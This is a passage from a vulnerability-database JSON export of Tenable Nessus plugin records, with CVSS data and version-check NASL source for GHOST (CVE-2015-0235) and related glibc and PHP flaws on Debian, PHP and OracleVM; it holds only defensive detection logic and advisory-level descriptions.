value:\"p-cpe:/a:debian:debian_linux:eglibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"eglibc\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc-bin\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc-dev-bin\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-dev\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-dev-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-i686\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-pic\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc0.1-prof\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", 
prefix:\"libc6\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-amd64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-amd64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-mips64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-mipsn32\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-ppc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-s390\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-s390x\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-dev-sparc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-i386\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-i686\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-loongson2f\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-mips64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-mipsn32\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-pic\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-ppc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-prof\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-s390\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-s390x\", reference:\"2.13-38+deb7u7\")) flag++;\nif 
(deb_check(release:\"7.0\", prefix:\"libc6-sparc64\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6-xen\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1-dev\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1-pic\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libc6.1-prof\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"locales\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"locales-all\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"multiarch-support\", reference:\"2.13-38+deb7u7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"nscd\", reference:\"2.13-38+deb7u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:37", "description": "According to its banner, the version of PHP 5.6.x installed on the remote host is prior to 5.6.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the enchant_broker_request_dict function in ext/enchant/enchant.c could allow a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. 
(CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the phar_rename_archive function in phar_object.c could allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM component due to improper parsing of XML data. A remote attacker can exploit this, via specially crafted XML data, to disclose sensitive information or cause a denial of service. (CVE-2015-8866)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2015-02-25T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-8866"], "modified": 
"2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_6.NASL", "href": "https://www.tenable.com/plugins/nessus/81512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81512);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9705\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-2301\",\n \"CVE-2015-8866\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73031,\n 73034,\n 73037\n );\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"PHP 5.6.x < 5.6.6 Multiple Vulnerabilities (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.6.x installed on the\nremote host is prior to 5.6.6. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow flaw in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c could allow a remote attacker\n to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library\n (glibc) due to improperly validating user-supplied input\n in the glibc functions __nss_hostname_digits_dots(),\n gethostbyname(), and gethostbyname2(). This allows a\n remote attacker to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function\n php_date_timezone_initialize_from_hash() within the\n 'ext/date/php_date.c' script. 
An attacker can exploit\n this to access sensitive information or crash\n applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the\n phar_rename_archive function in phar_object.c could\n allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM\n component due to improper parsing of XML data. A remote\n attacker can exploit this, via specially crafted XML\n data, to disclose sensitive information or cause a\n denial of service. (CVE-2015-8866)\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68925\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68942\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 
value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.[0-5]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.6' +\n '\\n';\n 
security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:03", "description": "According to its banner, the version of PHP 5.5.x installed on the remote host is prior to 5.5.22. It is, therefore, affected by multiple vulnerabilities :\n\n - A heap-based buffer overflow flaw in the enchant_broker_request_dict function in ext/enchant/enchant.c could allow a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function php_date_timezone_initialize_from_hash() within the 'ext/date/php_date.c' script. An attacker can exploit this to access sensitive information or crash applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the phar_rename_archive function in phar_object.c could allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM component due to improper parsing of XML data. A remote attacker can exploit this, via specially crafted XML data, to disclose sensitive information or cause a denial of service. 
(CVE-2015-8866) Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2015-02-25T00:00:00", "type": "nessus", "title": "PHP 5.5.x < 5.5.22 Multiple Vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9705", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-2301", "CVE-2015-8866"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_22.NASL", "href": "https://www.tenable.com/plugins/nessus/81511", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81511);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9705\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-2301\",\n \"CVE-2015-8866\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73031,\n 73034,\n 73037\n );\n script_xref(name:\"CERT\", 
value:\"967332\");\n\n script_name(english:\"PHP 5.5.x < 5.5.22 Multiple Vulnerabilities (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.5.x installed on the\nremote host is prior to 5.5.22. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A heap-based buffer overflow flaw in the\n enchant_broker_request_dict function in\n ext/enchant/enchant.c could allow a remote attacker\n to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2014-9705)\n\n - A heap-based buffer overflow flaw in the GNU C Library\n (glibc) due to improperly validating user-supplied input\n in the glibc functions __nss_hostname_digits_dots(),\n gethostbyname(), and gethostbyname2(). This allows a\n remote attacker to cause a buffer overflow, resulting in\n a denial of service condition or the execution of\n arbitrary code. (CVE-2015-0235)\n\n - A use-after-free flaw exists in the function\n php_date_timezone_initialize_from_hash() within the\n 'ext/date/php_date.c' script. An attacker can exploit\n this to access sensitive information or crash\n applications linked to PHP. (CVE-2015-0273)\n\n - A use-after-free vulnerability in the\n phar_rename_archive function in phar_object.c could\n allow a remote attacker to cause a denial of service.\n (CVE-2015-2301)\n\n - An XML External Entity (XXE) flaw exists in the PHP-FPM\n component due to improper parsing of XML data. A remote\n attacker can exploit this, via specially crafted XML\n data, to disclose sensitive information or cause a\n denial of service. 
(CVE-2015-8866)\n \nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.22\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68925\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68942\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.5.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[01])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.5.22' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:42", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Switch to use malloc when the input line is too long [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 
17642251] (Joe Jin)\n\n - Fix parsing of numeric hosts in gethostbyname_r (CVE-2015-0235, #1183532).\n\n - Remove gconv transliteration loadable modules support (CVE-2014-5119, - _nl_find_locale: Improve handling of crafted locale names (CVE-2014-0475, \n\n - Fix patch for integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Fix return code when starting an already started nscd daemon (#979413).\n\n - Fix getnameinfo for many PTR record queries (#1020486).\n\n - Return EINVAL error for negative sizees to getgroups (#995207).\n\n - Fix integer overflows in *valloc and memalign.\n (CVE-2013-4332, #1011805).\n\n - Add support for newer L3 caches on x86-64 and correctly count the number of hardware threads sharing a cacheline (#1003420).\n\n - Revert incomplete fix for bug #758193.\n\n - Fix _nl_find_msg malloc failure case, and callers (#957089).\n\n - Test on init_fct, not result->__init_fct, after demangling (#816647).\n\n - Don't handle ttl == 0 specially (#929035).\n\n - Fix multibyte character processing crash in regexp (CVE-2013-0242, #951132)\n\n - Fix getaddrinfo stack overflow resulting in application crash (CVE-2013-1914, #951132)\n\n - Add missing patch to avoid use after free (#816647)\n\n - Fix race in initgroups compat_call (#706571)\n\n - Fix return value from getaddrinfo when servers are down.\n (#758193)\n\n - Fix fseek on wide character streams. Sync's seeking code with RHEL 6 (#835828)\n\n - Call feraiseexcept only if exceptions are not masked (#861871).\n\n - Always demangle function before checking for NULL value.\n (#816647).\n\n - Do not fail in ttyname if /proc is not available (#851450).\n\n - Fix errno for various overflow situations in vfprintf.\n Add missing overflow checks. 
(#857387)\n\n - Handle failure of _nl_explode_name in all cases (#848481)\n\n - Define the default fuzz factor to 2 to make it easier to manipulate RHEL 5 RPMs on RHEL 6 and newer systems.\n\n - Fix race in intl/* testsuite (#849202)\n\n - Fix out of bounds array access in strto* exposed by 847930 patch.\n\n - Really fix POWER4 strncmp crash (#766832).\n\n - Fix integer overflow leading to buffer overflow in strto* (#847930)\n\n - Fix race in msort/qsort (#843672)\n\n - Fix regression due to 797096 changes (#845952)\n\n - Do not use PT_IEEE_IP ptrace calls (#839572)\n\n - Update ULPs (#837852)\n\n - Fix various transcendentals in non-default rounding modes (#837852)\n\n - Fix unbound alloca in vfprintf (#826947)\n\n - Fix iconv segfault if the invalid multibyte character 0xffff is input when converting from IBM930. (#823905)\n\n - Fix fnmatch when '*' wildcard is applied on a file name containing multibyte chars. (#819430)\n\n - Fix unbound allocas use in glob_in_dir, getaddrinfo and others. (#797096)\n\n - Fix segfault when running ld.so --verify on some DSO's in current working directory. 
(#808342)\n\n - Incorrect initialization order for dynamic loader (#813348)\n\n - Fix return code when stopping already stopped nscd daemon (#678227)\n\n - Remove MAP_32BIT for pthread stack mappings, use MAP_STACK instead (#641094)\n\n - Fix setuid vs sighandler_setxid race (#769852)\n\n - Fix access after end of search string in regex matcher (#757887)\n\n - Fix POWER4 strncmp crash (#766832)\n\n - Fix SC_*CACHE detection for X5670 cpus (#692182)\n\n - Fix parsing IPV6 entries in /etc/resolv.conf (#703239)\n\n - Fix double-free in nss_nis code (#500767)\n\n - Add kernel VDSO support for s390x (#795896)\n\n - Fix race in malloc arena creation and make implementation match documented behaviour (#800240)\n\n - Do not override TTL of CNAME with TTL of its alias (#808014)\n\n - Fix short month names in fi_FI locale #(657266).\n\n - Fix nscd crash for group with large number of members (#788989)\n\n - Fix Slovakia currency (#799853)\n\n - Fix getent malloc failure check (#806403)\n\n - Fix short month names in zh_CN locale (#657588)\n\n - Fix decimal point symbol for Portuguese currency (#710216)\n\n - Avoid integer overflow in sbrk (#767358)\n\n - Avoid race between [,__de]allocate_stack and\n __reclaim_stacks during fork (#738665)\n\n - Fix race between IO_flush_all_lockp & pthread_cancel (#751748)\n\n - Fix memory leak in NIS endgrent (#809325)\n\n - Allow getaddr to accept SCTP socket types in hints (#765710)\n\n - Fix errno handling in vfprintf (#794814)\n\n - Filter out <built-in> when building file lists (#784646).\n\n - Avoid 'nargs' integer overflow which could be used to bypass FORTIFY_SOURCE (#794814)\n\n - Fix currency_symbol for uk_UA (#639000)", "cvss3": {}, "published": "2015-02-02T00:00:00", "type": "nessus", "title": "OracleVM 2.2 : glibc (OVMSA-2015-0024) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0242", "CVE-2013-1914", "CVE-2013-4332", "CVE-2014-0475", "CVE-2014-5119", "CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:glibc", "p-cpe:/a:oracle:vm:glibc-common", "p-cpe:/a:oracle:vm:nscd", "cpe:/o:oracle:vm_server:2.2"], "id": "ORACLEVM_OVMSA-2015-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/81119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0024.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81119);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-4332\", \"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2015-0235\");\n script_bugtraq_id(57638, 58839, 62324, 68505, 68983, 69738, 72325);\n\n script_name(english:\"OracleVM 2.2 : glibc (OVMSA-2015-0024) (GHOST)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Switch to use malloc when the input line is too long\n [Orabug 19951108]\n\n - Use a /sys/devices/system/cpu/online for\n _SC_NPROCESSORS_ONLN implementation [Orabug 17642251]\n (Joe Jin)\n\n - Fix parsing of numeric 
